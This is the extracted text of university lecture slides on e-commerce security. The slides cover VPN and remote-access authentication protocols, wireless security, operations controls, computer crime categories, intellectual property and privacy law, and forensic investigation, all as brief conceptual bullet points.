• PPTP – Point-to-Point Tunneling Protocol– Works at the Data Link Layer– Single point to point connection from client to server– Common with asynchronous connections with NT and Win 95
• L2TP - Layer 2 Tunneling Protocol– Combination of PPTP and earlier Layer 2 Forwarding Protocol (L2F)– Multiple protocols can be encapsulated within the L2TP– Single point to point connection from client to server– Common with Dial-up VPNs
• IPSec– Operates at the network layer– Allows multiple and simultaneous tunnels– Encrypt and authenticate IP data– Focuses more on Network to Network Connectivity
ITEC5611
S. Kungpisdan113
Wireless Security
• WEP – Wired Equivalency Privacy – up to 128-bit WEP
• WPA (Wireless Protected Access) is more secure, recently WPA2
• WAP - Wireless Access Point• SSID – Service Set Identifier – Network Name
– Disable SSID broadcast
• Use encryption, VPN, treat as external connection, directional antenna
ITEC5611
S. Kungpisdan114
Remote Node Security Protocols
• Password Authentication Protocol (PAP)– Remote security protocol. Provides Identification and
Authentication.– Uses static replayable password for authentication (now
considered weak)– Does not encrypt the User ID or Password
• Challenge Handshake Protocol (CHAP)– Next evolution of PAP uses stronger authentication– Nonreplayable Challenge/Response– Verifies Identity of the node– Often used to enable network-to-network communication– Commonly used by remote access servers and xDSL, ISDN,
and cable modems
ITEC5611
S. Kungpisdan115
Remote Access Authentication System
• TACACS – Terminal Access Controller Access Control System (TCP)
• TACACS+ – includes the use of two factor authentication
• RADIUS – Remote Access Dial-In User Service (UDP)
ITEC5611
S. Kungpisdan116
TACACS
• Terminal Access Controller Access Control System • Provides remote authentication and related services• User password administered in a central database rather
than in individual routers• TACACS enabled network device prompts for user name
and static password• TACACS enabled network device queries TACACA
server to verify password• Does not support prompting for password change or use
of dynamic tokens
ITEC5611
S. Kungpisdan117
TACACS+
• Terminal Access Controller Access Control System Plus
• Proprietary CISCO enhancement• Two factor Authentication• User can change password• Ability to use secure tokens• Better Audit Trails
ITEC5611
S. Kungpisdan118
RADIUS
• Remote Access Dial-In User Service • Offers similar benefits to TACACS+• Often used as a stepping stone to TACACS+• Radius Server contains dynamic password and network
service access information (Network ACLS)• Radius is a fully open protocol, can be customized for
almost any security system• Can be used with Kerberos and provides CHAP remote
node authentication• Except does not work with:
– Apple Talk Remote Access Resolution Protocol– NetBios Frame Protocol Control Protocol– Netware Asynchronous Services Interface– X.25 PAD Connection
ITEC5611
S. Kungpisdan119
Honeypots
• Production systems (e.g., firewalls, routers, Web servers, database servers) designed to do real work but that are watched and studied as network intrusions occur
ITEC5611
S. Kungpisdan120
Layered Security
ITEC5611
S. Kungpisdan121
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan122
Asset, Vulnerability, Threat
• Asset – anything that is a computer resource (i.e. software data)
• Vulnerability – weakness in a system that enables security to be violated (i.e. Weak Segregation of duties)
• Threat – an event that could cause harm by violating the security ( i.e. Operator abuse of privileges)
ITEC5611
S. Kungpisdan123
CIA
• Confidentiality – operations controls affect confidentiality of data.
• Integrity – how well operations controls are implemented affects data integrity
• Availability – fault tolerance and ability to recover
ITEC5611
S. Kungpisdan124
Controls and Protections
• Controls to protect hardware, software and media from:– Threats in an operating environment– Internal and external intruders– Operators inappropriately accessing
resources
ITEC5611
S. Kungpisdan125
Categories of Controls
• Preventative – prevent harmful occurrence– Lower amount and impact of errors entering the
system– Prevent unauthorized intruders from accessing the
system
• Detective – detect after harmful occurrence– Track unauthorized transactions
• Corrective – restore after harmful occurrence– Data recovery
ITEC5611
S. Kungpisdan126
Separation of Duties
• Assign different tasks to different personnel• No single person can completely compromise a system• Related to the concept of least privileges – least
privileges required to do one’s job• Secure Systems - System Administrator and Security
Administrator must be different roles.• Highly Secure Systems - System Administrator, Security
Administrator, and Enhanced Operator must be different roles.
ITEC5611
S. Kungpisdan127
System Administrator Functions
• Installing software• Start up and shut down of system• Adding removing users• Performing back up and recovery• Handling printers and queues
ITEC5611
S. Kungpisdan128
Security Administrator Functions
• Setting user clearances, initial passwords and other security characteristics for new users
• Changing security profiles for users• Setting file sensitivity labels• Setting security of devices• Renewing audit data
ITEC5611
S. Kungpisdan129
Least Privilege
• No access beyond job requirements
• Group level privileges for Operators– Read Only– Read /Write - usually copies of original data– Access Change – make changes to original
data
ITEC5611
S. Kungpisdan130
Operation Controls
• Resource Protection
• Hardware Controls
• Software Controls
ITEC5611
S. Kungpisdan131
Resource Protection
• Protecting Resources from disclosure alteration or misuse– Hardware – routers, firewalls, computers,
printers– Software – libraries, vendor software, OS
software– Data Resource – backup data, user data, logs
ITEC5611
S. Kungpisdan132
Hardware Controls
• Hardware Maintenance– Requires physical and logical access by support and vendors– Supervision of vendors and maintenance, background checks
• Maintenance Accounts– Disable maintenance accounts when not needed– Rename default passwords
• Diagnostic Port Control– Specific ports for maintenance– Should be blocked from external access
• Hardware Physical Controls – require locks and alarms– Sensitive operator terminals– Media storage rooms– Server and communications equipment– Modem pools and circuit rooms
ITEC5611
S. Kungpisdan133
Software Controls
• Anti-virus Management – prevent download of viruses
• Software Testing – formal rigid software testing process
• Software Utilities – control of powerful utilities• Safe software Storage – prevent modification of
software and copies of backups• Back up Controls – test and restore backups
ITEC5611
S. Kungpisdan134
Physical Protection
• Protection from physical access– Hardware – routers, firewalls, computers, printers– Software – libraries, vendor software, OS software
• Physical piggybacking – following an authorized person through a door
ITEC5611
S. Kungpisdan135
Monitoring and Audits
• Monitoring – problem identification and resolution
• Monitor for:– Illegal Software Installation– Hardware Faults– Error States– Operational Events
ITEC5611
S. Kungpisdan136
Penetration Testing
• Testing a networks defenses by using the same techniques as external intruders– Scanning and Probing – port scanners– Demon Dialing – war dialing for modems– Sniffing – capture data packets– Dumpster Diving – searching paper disposal areas– Social Engineering – most common, get information
by asking
ITEC5611
S. Kungpisdan137
Auditing
• IT Auditors Audit:– Backup Controls– System and Transaction Controls– Data Library Controls– Systems Development Standards– Data Center Security– Contingency Plans
ITEC5611
S. Kungpisdan138
Audit Trails
• Enables tracking of history of modifications, deletions, additions.
• Allow for accountability• Audit logs should record:
– Transaction time and date– Who processed transaction– Which terminal was used– Various security events relating to transaction
ITEC5611
S. Kungpisdan139
Illegal Computer Operations
• Eavesdropping – sniffing, dumpster diving, social engineering
• Fraud – collusion, falsified transactions• Theft – information or trade secrets, physical
hardware and software theft• Sabotage – Denial of Service (DoS), production
delays• External Attacks – malicious cracking, scanning,
war dialing
ITEC5611
S. Kungpisdan140
Outline
• EC Architectural Framework• EC Security
– Basic Security Issues– Security Incidences– Attacking Web Applications– Access Controls– Securing EC Communications– Securing EC Networks– Operations Security– Law, Investigation, and Ethics
ITEC5611
S. Kungpisdan141
Computer Crimes
• Crimes against the computer
• Crimes using a computer
ITEC5611
S. Kungpisdan142
Most Common Crimes
• Denial of Service (DoS)• Theft or passwords • Network Intrusions• Emanation Eavesdropping• Social Engineering• Illegal Content of Material -
porn• Fraud – using computer to
perpetuate crimes, i.e. auctions of non-existent merchandise
• Software Piracy• Dumpster Diving• Malicious Code• Spoofing of IP Addresses
• Information Warfare – attacking infrastructure of a Nation, including military and power grid
• Destruction or alteration of information
• Use of readily available Attack Scripts – Script Kiddies, unskilled users
• Masquerading• Embezzlement – Illegally
acquiring funds• Data-Diddling – modification of
data• Terrorism
ITEC5611
S. Kungpisdan143
Intellectual Property Law
• Patent – Provides owner legally enforceable right to exclude others for specified time (U.S. 17 years)
• Copyright – Protects original works of authorship, can be used for software and databases
• Trade Secret – Secures confidentiality of proprietary technical and business related information– Company must meet requirements:
• Invested resources to develop the information• Valuable to the business• Valuable to competitor• Non-obvious information
• Trademark – establishes word, name, symbol, color or sounds used to identify and distinguish goods
ITEC5611
S. Kungpisdan144
Information Privacy Laws
• Intent varies widely from country to country• European Union - has developed more
protective laws for individual privacy– Transfer of data from EU to US is prohibited unless
equivalent protections are in place
ITEC5611
S. Kungpisdan145
Electronic Monitoring
• Keystroke monitoring, e-mail monitoring, surveillance cameras, badges and magnetic card keys all allow monitoring of individuals.
• Key to monitoring: Must be done in a lawful manner in a consistent fashion
ITEC5611
S. Kungpisdan146
E-mail monitoring
• Inform users that all e-mail is being monitored by displaying log-on banner– Banner should state: logging on to system consents
user to being monitored. Unauthorized access is prohibited. Subject to prosecution.
• Ensure monitoring is uniformly applied• Explain acceptable use• Explain who can read e-mail and how long it is
backed up• No guarantee of privacy
ITEC5611
S. Kungpisdan147
Computer Forensics
• Collecting information from and about computer systems that is admissible in a court of law.
ITEC5611
S. Kungpisdan148
Evidence Life Cycle
• Discovery and recognition• Protection• Recording• Collection
– Collect all relevant storage media– Make image of hard disk before removing power– Print out screen– Avoid degaussing equipment
• Identification (tagging and marking)• Preservation
– Protect from magnetic erasure– Store in proper environment
• Transportation• Presentation in court• Return to evidence owner
ITEC5611
S. Kungpisdan149
Conducting the Investigation
• Corporate investigation should include Management, corporate security, Human Resources, legal department and other appropriate staff.
• Committee should be set up before hand to address the following issues:– Establishing liaison with law enforcement– Deciding when and if to bring in law enforcement (FBI and
Secret Service)– Setting up means of reporting computer crimes– Establishing procedures for handling reports of computer crimes– Planning and conducting investigations– Involving senior management and corporate security, Human
Resources, the legal dept.– Ensuring proper collection of evidence
ITEC5611
S. Kungpisdan150
Good Sources of Evidence
• Telephone records• Video cameras• Audit trails• System logs• System backups• Witnesses• Results of surveillance• E-mails
ITEC5611
S. Kungpisdan151
MOM
• Motive
• Opportunity
• Means
ITEC5611
S. Kungpisdan152
Interview
• If interviewing do not give information away to suspect
• Questions should be scripted
• Don’t use original documents in the interview
Questions?